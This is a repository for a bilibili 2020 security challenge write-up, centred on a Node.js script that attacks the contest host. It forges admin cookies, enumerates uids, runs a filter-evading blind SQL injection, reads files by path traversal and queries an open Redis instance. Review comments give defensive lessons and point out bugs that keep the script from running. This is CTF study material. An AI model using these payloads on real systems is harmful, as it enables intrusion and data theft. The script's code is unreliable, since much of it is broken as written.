├── .gitignore ├── README.md ├── package.json ├── LICENSE └── index.js /.gitignore: -------------------------------------------------------------------------------- 1 | node_modules -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # bilibili-sec2020-writeup 2 | 哔哩哔哩2020年度安全挑战赛 - Writeup 3 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "bilibili-sec2020-writeup", 3 | "version": "1.0.0", 4 | "description": "哔哩哔哩2020年度安全挑战赛 - Writeup", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "keywords": [ 10 | "bilibili", 11 | "writeup", 12 | "web", 13 | "ctf", 14 | "sec" 15 | ], 16 | "author": "CNMathon ", 17 | "license": "MIT", 18 | "dependencies": { 19 | "redis": "^3.0.2", 20 | "request": "^2.88.2" 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 埋桑 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------
/index.js:
--------------------------------------------------------------------------------
/*
 * Solution script accompanying the bilibili 2020 security challenge write-up.
 * Each funcN builds a `config` object that describes one request against the
 * challenge host (HTTP via `request`, Redis via `redis`), fires it, and prints
 * whatever the handler extracts to stdout.
 *
 * NOTE(review): as committed the script cannot run end to end. In most
 * `request()` methods the handler is passed as a bare `callback` identifier,
 * but the only `callback` in scope is the object method (`this.callback`), so
 * the first call, `func1()`, throws a ReferenceError and nothing after it
 * executes. The per-function comments below list the other scoping problems;
 * none of them are corrected here.
 *
 * What the challenges illustrate from the defending side:
 *  - privilege is keyed on a client-supplied `role` cookie holding an unsalted
 *    MD5 of a role name (func4's comment names the admin value). Authorization
 *    must come from server-side session state, never from a cookie the client
 *    can rewrite.
 *  - `/api/images?file=` is reached with `../` sequences (func7, func9);
 *    canonicalise the path and allow-list the files that may be served.
 *  - func8 opens Redis on the challenge host with no credentials; a datastore
 *    should be bound to localhost, require auth and sit behind a firewall.
 *  - func6 carries its query fragment in the Referer header; the doubled
 *    keywords in the payload suggest the server strips keywords once, which
 *    is not a defence — use parameterised queries.
 *  - func5 walks sequential `uid` values; enforce per-object authorization
 *    and rate limits so enumeration is neither possible nor cheap.
 */
const request = require("request");
const redis = require("redis");

// Shared session cookie value appended to every request.
// NOTE(review): this is a credential slot in a committed file; it is blank
// here, but it would be safer read from an environment variable.
let session = ""; // fill in your personal session here

// Challenge 1 - inspect page source + inspect requests
// GET /api/admin with the challenge User-Agent and the session cookie; on a
// 200 the handler prints `body.data` (assumes the JSON body has a `data` key).
// NOTE(review): `callback` in request() below is not declared in any enclosing
// scope (the handler is `this.callback`), so calling func1() throws a
// ReferenceError before any request is sent.
const func1 = function () {
  const config = {
    url: "http://45.113.201.36/api/admin",
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `session=${session}`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        console.log("flag1:", body.data);
      }
    },
    request() {
      request(
        {
          url: this.url,
          headers: this.headers,
          json: true,
        },
        callback
      );
    },
  };

  config.request();
};

// Challenge 2 - change the User-Agent
// Same shape as func1 against /api/ctf/2; prints `body.data` as flag2.
// NOTE(review): same free `callback` identifier as func1 — throws a
// ReferenceError when called.
const func2 = function () {
  const config = {
    url: "http://45.113.201.36/api/ctf/2",
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `session=${session}`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        console.log("flag2:", body.data);
      }
    },
    request() {
      request(
        {
          url: this.url,
          headers: this.headers,
          json: true,
        },
        callback
      );
    },
  };

  config.request();
};

// Challenge 3
// POST /api/ctf/3 with a `role` cookie alongside the session cookie.
// NOTE(review): `this.role` in the Cookie template is evaluated while the
// object literal is being built, so `this` is the enclosing function's `this`,
// not `config`; the cookie presumably ends up as `role=undefined`. The same
// pattern recurs in func4, func5, func6 (outer headers), func7, func9 and
// func10. `callback` in request() is again a free identifier.
const func3 = function () {
  const config = {
    url: "http://45.113.201.36/api/ctf/3",
    role: "ee11cbb19052e40b07aac0ca060c23ee",
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `role=${this.role}; session=${session};`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        console.log("flag3:", body.data);
      }
    },
    request() {
      request.post(
        {
          url: this.url,
          headers: this.headers,
          json: true,
        },
        callback
      );
    },
  };

  config.request();
};

// Challenge 4 - change the `role` cookie
// As func3, but with the administrator role hash; prints `body.data` as flag4.
// NOTE(review): same `this.role` and free `callback` issues as func3.
const func4 = function () {
  const config = {
    url: "http://45.113.201.36/api/ctf/4",
    role: "7b7bc2512ee1fedcd76bdc68926d4f7b", // i.e. the MD5 of 'Administrator'; needs changing.
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `role=${this.role}; session=${session};`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        console.log("flag4:", body.data);
      }
    },
    request() {
      request.post(
        {
          url: this.url,
          headers: this.headers,
          json: true,
        },
        callback
      );
    },
  };

  config.request();
};

// Challenge 5 - brute force
// Intended flow (as far as the code shows): query /api/ctf/5 for `uid`, and
// while the response carries no `flag`, increment `uid` and post again from
// inside the handler; print `body.data` once `flag` is present.
// NOTE(review): the `url` getter reads a bare `uid`, and the handler reads bare
// `uid`, `url` and `headers`; none of these are declared — they are properties
// of `config` and would need `this.`. The first `this.url` access in request()
// therefore throws a ReferenceError. Inside the handler `this.callback` also
// depends on what `this` the request library binds when invoking the handler,
// which is not visible here.
const func5 = function () {
  const config = {
    uid: 100336889,
    get url() {
      return `http://45.113.201.36/api/ctf/5?uid=${uid}`;
    },
    role: "ee11cbb19052e40b07aac0ca060c23ee",
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `role=${this.role}; session=${session};`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        if (body.flag === undefined) {
          uid++;
          request.post(
            {
              url,
              headers,
              json: true,
            },
            this.callback
          );
        } else {
          console.log("flag5:", body.data);
          return;
        }
      }
    },
    request() {
      request(
        {
          url: this.url,
          headers: this.headers,
          json: true,
        },
        callback
      );
    },
  };

  config.request();
};

// Challenge 6 - SQL injection
// Intended flow: for each of 100 character positions, binary-search the
// character's code between 33 and 128 by comparing the length of the
// returned page (5596 is treated as the "true" branch).
// NOTE(review):
//  - `url` in the inner request() call is a bare identifier (the property is
//    `this.url`), so the first loop iteration throws a ReferenceError.
//  - even with that resolved, `left`/`right` are only updated inside the async
//    handler, while the `while` condition is re-checked synchronously, so the
//    loop could not observe the updates.
//  - `String.charCodeAt` is not a static method; that line would throw if
//    reached, and `flag = ...` targets an undeclared name rather than
//    `this.flag`.
//  - the `callback` method on `config` is never used (a local `callback` is
//    built per iteration), and its label "flag4:" looks like a copy-paste
//    leftover from func4.
//  - `this.role` does resolve to `config.role` inside the method body
//    (request() is invoked as `config.request()`), unlike the outer `headers`.
const func6 = function () {
  const config = {
    url: "http://45.113.201.36/blog/single.php?id=1",
    flag: "",
    role: "ee11cbb19052e40b07aac0ca060c23ee",
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `role=${this.role}; session=${session};`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        console.log("flag4:", body.data);
      }
    },
    request() {
      for (let i = 1; i <= 100; i++) {
        let left = 33;
        let right = 128;

        while (right - left != 1) {
          let mid = Math.floor((left + right) / 2);
          let payload = `0123'^if(substr((selselectect flag from flag),${i},1)>binary ${mid.toString(
            16
          )},(selecselectt 1+~0),0) ununionion selecselectt 1,2#`;
          let headers = {
            Cookie: `role=${this.role}; session=${session};`,
            Referer: payload,
          };
          let callback = function (error, response, body) {
            if (!error && response.statusCode == 200) {
              if (body.data.length == 5596) {
                left = mid;
              } else {
                right = mid;
              }
            }
          };
          request(
            {
              url,
              headers,
              json: true,
            },
            callback
          );
        }
        flag = String.charCodeAt(right);
      }
      console.log("flag6:", flag);
    },
  };

  config.request();
};

// Challenge 7 - arbitrary file read
// GET /api/images with a traversal `file=` parameter; the handler is an empty
// placeholder, so nothing is printed even on success.
// NOTE(review): `url`, `headers` and `callback` in request() are all bare
// identifiers (properties of `config`), so calling func7() throws a
// ReferenceError.
const func7 = function () {
  const config = {
    url: "http://45.113.201.36/api/images?file=../../../flag7.txt",
    role: "7b7bc2512ee1fedcd76bdc68926d4f7b",
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `role=${this.role}; session=${session};`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        // file read
      }
    },
    request() {
      request(
        {
          url,
          headers,
          json: true,
        },
        callback
      );
    },
  };

  config.request();
};

// Challenge 8 - query Redis
// Connects to Redis on the challenge host (port 6379, no credentials) and on
// "connect" reads the key "flag8", printing the reply.
// NOTE(review): `client` is a getter that calls `redis.createClient` on every
// access, so connect() and callback() would each talk to a different client.
// `callback` in connect() is a free identifier, so the call creates one client
// (which starts connecting) and then throws a ReferenceError.
const func8 = function () {
  const config = {
    get client() {
      return redis.createClient(6379, "45.113.201.36");
    },
    callback() {
      this.client.get("flag8", function (err, reply) {
        if (!err) {
          console.log(reply.toString());
        }
      });
    },
    connect() {
      this.client.on("connect", callback);
    },
  };

  config.connect();
};

// Challenge 9 - arbitrary file read + key decryption
// POST /api/images with a traversal `file=` parameter; the handler is a
// placeholder — decryption of the returned string is not implemented here.
// NOTE(review): this one passes `this.callback`, so it would send a request.
// The Cookie reads `this.session`, which `config` does not define (the module
// variable `session` looks intended); the `this.role` caveat from func3 applies.
const func9 = function () {
  const config = {
    url: "http://45.113.201.36/api/images?file=../../../secret.txt",
    role: "ee11cbb19052e40b07aac0ca060c23ee",
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `role=${this.role}; session=${this.session};`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        // yields an encrypted string; decrypting it gives the flag
      }
    },
    request() {
      request.post(
        {
          url: this.url,
          headers: this.headers,
          json: true,
        },
        this.callback
      );
    },
  };

  config.request();
};

// Challenge 10 - Meta Type
// POST /blog/end.php with an array-typed `id[]` and `url=flag.txt`; the
// handler is a placeholder. Passes `this.callback`, so it would send a request
// (subject to the `this.role` caveat from func3).
const func10 = function () {
  const config = {
    url: "http://45.113.201.36/blog/end.php?id[]=&url=flag.txt", // After dirsearch, /blog/test.php was found; it returns jsfuck-encoded JS which decodes to: var str1 = "程序员最多的地方"; var str2 = "bilibili1024havefun"; console.log(). Locating the matching repository on GitHub and following its hint gives this URL.
    role: "ee11cbb19052e40b07aac0ca060c23ee",
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `role=${this.role}; session=${session};`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        // yields an encrypted string; decrypting it gives the flag
      }
    },
    request() {
      request.post(
        {
          url: this.url,
          headers: this.headers,
          json: true,
        },
        this.callback
      );
    },
  };

  config.request();
};

// Run all ten solutions in order. Each call only schedules a request; since
// func1() throws synchronously and nothing catches it, func2..func10 are
// never reached as the file stands.
func1();
func2();
func3();
func4();
func5();
func6();
func7();
func8();
func9();
func10();
--------------------------------------------------------------------------------